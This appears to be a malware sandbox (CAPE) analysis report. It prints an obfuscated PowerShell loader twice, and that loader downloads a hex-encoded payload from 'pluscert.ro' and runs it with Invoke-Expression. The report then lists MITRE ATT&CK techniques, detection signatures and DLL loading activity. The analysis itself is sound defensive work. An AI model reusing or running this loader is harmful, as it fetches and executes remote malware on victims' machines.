F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})){[char]([convert]::toint16($_,16))}{( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}$Tbone='>EX'.replace('>','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|M;[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'http://pluscert.ro/7P.jpg');$asciiChars= $mv -split '#' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join ''|M
  
                                        

                                    

                                    
                                
                            

                            

                                
                                    
                                    

                                        

                                            PID: 968 - 
                                            Downloader
                                            
                                            Starts Process
                                            
                                            Compression
                                            
                                            Uses Stealth
                                            
                                            Screen Scraping
                                            
                                            Custom Web Fields
                                            
                                            Sleeps
                                            
                                            Uninstalls Apps
                                            
                                            Obfuscation
                                            
                                            Enumeration/Profiling
                                            
                                            Sends Data
                                            
                                            AppLocker Bypass
                                            
                                            AMSI Bypass
                                            
                                            Disables Windows Defender
                                            
                                            Clear Logs
                                            
                                            Invokes C# .NET Assemblies
                                            
                                            Modifies Shadowcopy
                                            
                                        

                                        

                                              Event:
                                            01
                                            
$biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$biLMH.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})){[char]([convert]::toint16($_,16))}{( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}$Tbone='>EX'.replace('>','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$tty='(New-Object Net.WebClient)'|M;[void] [System.Reflection.Assembly]::LoadWithPartialName'Microsoft.VisualBasic';$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'http://pluscert.ro/7P.jpg');$asciiChars= $mv -split '#' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join ''
  
                                        

                                    

                                    
                                
                            

                            
                        

                    

                

            

        

    







    

    

    





    

        
            

            
                Defense Evasion
            
                Discovery
            
                Command and Control
            
                Execution
            
                Privilege Escalation
            
                Initial Access
            
            

            
                

                    
    
                        
                            
  • 
                                 T1564 - Hide Artifacts
                                
      
                                
                                    
    • stealth_file
      • 
                                
                                    
    • stealth_window
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1036 - Masquerading
                                
      
                                
                                    
    • network_connection_via_suspicious_process
      • 
                                
                                    
    • accesses_public_folder
      • 
                                
                                    
    • modifies_windows_system_files
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1055 - Process Injection
                                
      
                                
                                    
    • network_connection_via_suspicious_process
      • 
                                
                                    
    • resumethread_remote_process
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1548 - Abuse Elevation Control Mechanism
                                
      
                                
                                    
    • accesses_public_folder
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1070 - Indicator Removal
                                
      
                                
                                    
    • deletes_files
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1064 - Scripting
                                
      
                                
                                    
    • powershell_command_suspicious
      • 
                                
                                    
    • powershell_scriptblock_logging
      • 
                                
                                    
    • powershell_variable_obfuscation
      • 
                                
                                    
    • script_tool_executed
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1027 - Obfuscated Files or Information
                                
      
                                
                                    
    • powershell_variable_obfuscation
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1564.003 - Hidden Window
                                
      
                                
                                    
    • stealth_window
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1070.004 - File Deletion
                                
      
                                
                                    
    • deletes_files
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1564.001 - Hidden Files and Directories
                                
      
                                
                                    
    • stealth_file
      • 
                                
                                
    
                            
    • 
                        
                    

                		
            
                
                    
    
                        
                            
  • 
                                 T1082 - System Information Discovery
                                
      
                                
                                    
    • antivm_checks_available_memory
      • 
                                
                                
    
                            
    • 
                        
                    

                		
            
                
                    
    
                        
                            
  • 
                                 T1071 - Application Layer Protocol
                                
      
                                
                                    
    • dynamic_function_loading
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1095 - Non-Application Layer Protocol
                                
      
                                
                                    
    • network_icmp
      • 
                                
                                
    
                            
    • 
                        
                    

                		
            
                
                    
    
                        
                            
  • 
                                 T1106 - Native API
                                
      
                                
                                    
    • antidebug_guardpages
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1059 - Command and Scripting Interpreter
                                
      
                                
                                    
    • powershell_command_suspicious
      • 
                                
                                    
    • powershell_scriptblock_logging
      • 
                                
                                    
    • cmdline_long_string
      • 
                                
                                    
    • long_commandline
      • 
                                
                                    
    • powershell_variable_obfuscation
      • 
                                
                                    
    • script_tool_executed
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1064 - Scripting
                                
      
                                
                                    
    • powershell_command_suspicious
      • 
                                
                                    
    • powershell_scriptblock_logging
      • 
                                
                                    
    • powershell_variable_obfuscation
      • 
                                
                                    
    • script_tool_executed
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1059.001 - PowerShell
                                
      
                                
                                    
    • powershell_command_suspicious
      • 
                                
                                    
    • powershell_scriptblock_logging
      • 
                                
                                    
    • powershell_variable_obfuscation
      • 
                                
                                
    
                            
    • 
                        
                    

                		
            
                
                    
    
                        
                            
  • 
                                 T1055 - Process Injection
                                
      
                                
                                    
    • network_connection_via_suspicious_process
      • 
                                
                                    
    • resumethread_remote_process
      • 
                                
                                
    
                            
    • 
                        
                            
  • 
                                 T1548 - Abuse Elevation Control Mechanism
                                
      
                                
                                    
    • accesses_public_folder
      • 
                                
                                
    
                            
    • 
                        
                    

                		
            
                
                    
    
                        
                            
  • 
                                 T1566 - Phishing
                                
      
                                
                                    
    • uses_Microsoft_HTML_Help_Executable
      • 
                                
                                
    
                            
    • 
                        
                    

                		
            
        

    






    

    
    
    

        

    

    

        
            
                

                

    
Usage

    

        
    




                

                

            
        
        

            

                

                    
Processing ( 4.94 seconds )

                    
    
                        
                            
                            
  • 
                                4.342
                                CAPE
                            
    • 
                            
                        
                            
                            
  • 
                                0.59
                                BehaviorAnalysis
                            
    • 
                            
                        
                            
                            
  • 
                                0.007
                                NetworkAnalysis
                            
    • 
                            
                        
                            
                            
  • 
                                0.003
                                AnalysisInfo
                            
    • 
                            
                        
                            
                            
  • 
                                0.002
                                Curtain
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                Debug
                            
    • 
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                    

                

                

                
Signatures ( 0.10 seconds )

                    
    
                        
                            
                            
  • 
                                0.023
                                antiav_detectreg
                            
    • 
                            
                        
                            
                            
  • 
                                0.01
                                territorial_disputes_sigs
                            
    • 
                            
                        
                            
                            
  • 
                                0.009
                                infostealer_ftp
                            
    • 
                            
                        
                            
                            
  • 
                                0.005
                                antianalysis_detectreg
                            
    • 
                            
                        
                            
                            
  • 
                                0.005
                                infostealer_im
                            
    • 
                            
                        
                            
                            
  • 
                                0.005
                                masquerade_process_name
                            
    • 
                            
                        
                            
                            
  • 
                                0.004
                                antiav_detectfile
                            
    • 
                            
                        
                            
                            
  • 
                                0.004
                                infostealer_mail
                            
    • 
                            
                        
                            
                            
  • 
                                0.003
                                antianalysis_detectfile
                            
    • 
                            
                        
                            
                            
  • 
                                0.003
                                infostealer_bitcoin
                            
    • 
                            
                        
                            
                            
  • 
                                0.003
                                ransomware_files
                            
    • 
                            
                        
                            
                            
  • 
                                0.002
                                antidebug_devices
                            
    • 
                            
                        
                            
                            
  • 
                                0.002
                                antivm_vbox_files
                            
    • 
                            
                        
                            
                            
  • 
                                0.002
                                antivm_vbox_keys
                            
    • 
                            
                        
                            
                            
  • 
                                0.002
                                antivm_vmware_keys
                            
    • 
                            
                        
                            
                            
  • 
                                0.002
                                ransomware_extensions
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                network_dyndns
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                antivm_generic_diskreg
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                antivm_parallels_keys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                antivm_vpc_keys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                antivm_xen_keys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                ketrican_regkeys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                geodo_banking_trojan
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                browser_security
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                darkcomet_regkeys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                disables_windows_defender_logging
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                removes_windows_defender_contextmenu
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                poullight_files
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                limerat_regkeys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                recon_fingerprint
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                remcos_regkeys
                            
    • 
                            
                        
                            
                            
  • 
                                0.001
                                ursnif_behavior
                            
    • 
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                            
                        
                    

                

                

                    
Reporting ( 0.26 seconds )

                
    
                    
                        
                        
  • 
                            0.181
                            ReportHTML
                        
    • 
                        
                    
                        
                        
  • 
                            0.035
                            LiteReport
                        
    • 
                        
                    
                        
                        
  • 
                            0.035
                            JsonDump
                        
    • 
                        
                    
                        
                        
  • 
                            0.005
                            MITRE_TTPS
                        
    • 
                        
                    
                        
                        
  • 
                            0.001
                            PCAP2CERT
                        
    • 
                        
                    
                        
                    
                

                

            

        


    









    
Signatures

    
        
            
            
                

            
            Checks available memory

            

            
                

                    
                        
                    
                

            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Queries the keyboard layout

            

            
                

                    
                        
                    
                

            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            A file was accessed within the Public folder.

            

            
                
                    
                        
file: C:\Users\Public\Desktop

                    
                
                    
                        
file: C:\Users\Public\desktop.ini

                    
                
                    
                        
file: C:\Users\Public\Desktop\desktop.ini

                    
                
            
            
            

        
            
            
                

            
            SetUnhandledExceptionFilter detected (possible anti-debug)

            

            
                

                    
                        
                    
                

            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            A file with an unusual extension was attempted to be loaded as a DLL.

            

            
                

                    
                        
                    
                

            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Suspicious behavior was detected in a PowerShell process by script block logging

            

            
                
                    
                        
968: Downloader, Starts Process, Compression, Uses Stealth, Screen Scraping, Custom Web Fields, Sleeps, Uninstalls Apps, Obfuscation, Enumeration/Profiling, Sends Data, AppLocker Bypass, AMSI Bypass, Disables Windows Defender, Clear Logs, Invokes C# .NET Assemblies, Modifies Shadowcopy

                    
                
            
            
            

        
            
            
                

            
            Guard pages use detected - possible anti-debugging.

            

            
                

                    
                        
                    
                

            
            
                

                
                    
                    
                
            
            

        
            
            
                

            
            Deletes files from disk

            

            
                
                    
                        
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF22641b9.TMP

                    
                
                    
                        
DeletedFile: C:\Users\user\AppData\Local\Temp\uyhh2amx.eph.ps1

                    
                
                    
                        
DeletedFile: C:\Users\user\AppData\Local\Temp\bzfyfzsr.33n.psm1

                    
                
            
            
            

        
            
            
                

            
            Dynamic (imported) function loading detected

            

            
                
                    
                        
DynamicLoader: hhctrl.ocx/doWinMain

                    
                
                    
                        
DynamicLoader: CRYPTBASE.dll/SystemFunction036

                    
                
                    
                        
DynamicLoader: uxtheme.dll/ThemeInitApiHook

                    
                
                    
                        
DynamicLoader: USER32.dll/IsProcessDPIAware

                    
                
                    
                        
DynamicLoader: kernel32.dll/SortGetHandle

                    
                
                    
                        
DynamicLoader: kernel32.dll/SortCloseHandle

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages

                    
                
                    
                        
DynamicLoader: SHELL32.dll/SHGetFolderPathW

                    
                
                    
                        
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryA

                    
                
                    
                        
DynamicLoader: kernel32.dll/GetWindowsDirectoryA

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/CheckTokenMembership

                    
                
                    
                        
DynamicLoader: USER32.dll/GetSystemMetrics

                    
                
                    
                        
DynamicLoader: USER32.dll/MonitorFromWindow

                    
                
                    
                        
DynamicLoader: USER32.dll/MonitorFromRect

                    
                
                    
                        
DynamicLoader: USER32.dll/MonitorFromPoint

                    
                
                    
                        
DynamicLoader: USER32.dll/EnumDisplayMonitors

                    
                
                    
                        
DynamicLoader: USER32.dll/GetMonitorInfoA

                    
                
                    
                        
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW

                    
                
                    
                        
DynamicLoader: CRYPTSP.dll/CryptGenRandom

                    
                
                    
                        
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive

                    
                
                    
                        
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW

                    
                
                    
                        
DynamicLoader: urlmon.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/CoInitializeEx

                    
                
                    
                        
DynamicLoader: ole32.dll/CoUninitialize

                    
                
                    
                        
DynamicLoader: ole32.dll/CoRegisterInitializeSpy

                    
                
                    
                        
DynamicLoader: ole32.dll/CoRevokeInitializeSpy

                    
                
                    
                        
DynamicLoader: GDI32.dll/GetLayout

                    
                
                    
                        
DynamicLoader: GDI32.dll/GdiRealizationInfo

                    
                
                    
                        
DynamicLoader: GDI32.dll/FontIsLinked

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW

                    
                
                    
                        
DynamicLoader: GDI32.dll/GetTextFaceAliasW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumValueW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegCloseKey

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueExW

                    
                
                    
                        
DynamicLoader: GDI32.dll/GetFontAssocStatus

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueExA

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW

                    
                
                    
                        
DynamicLoader: GDI32.dll/GetTextFaceAliasW

                    
                
                    
                        
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC

                    
                
                    
                        
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegOpenKeyW

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegQueryValueW

                    
                
                    
                        
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetApartmentType

                    
                
                    
                        
DynamicLoader: ole32.dll/CoRegisterInitializeSpy

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemFree

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: OLEAUT32.dll/

                    
                
                    
                        
DynamicLoader: ole32.dll/CoTaskMemAlloc

                    
                
                    
                        
DynamicLoader: ole32.dll/CoGetMalloc

                    
                
                    
                        
DynamicLoader: SHELL32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: comctl32.dll/

                    
                
                    
                        
DynamicLoader: ADVAPI32.dll/RegEnumKeyW

                    
                
                    
                        
DynamicLoader: apphelp.dll/ApphelpCheckShellObject

                    
                
                    
                        
DynamicLoader: ole32.dll/CoCreateInstance

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHUnicodeToAnsi

                    
                
                    
                        
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueA

                    
                
                    
                        
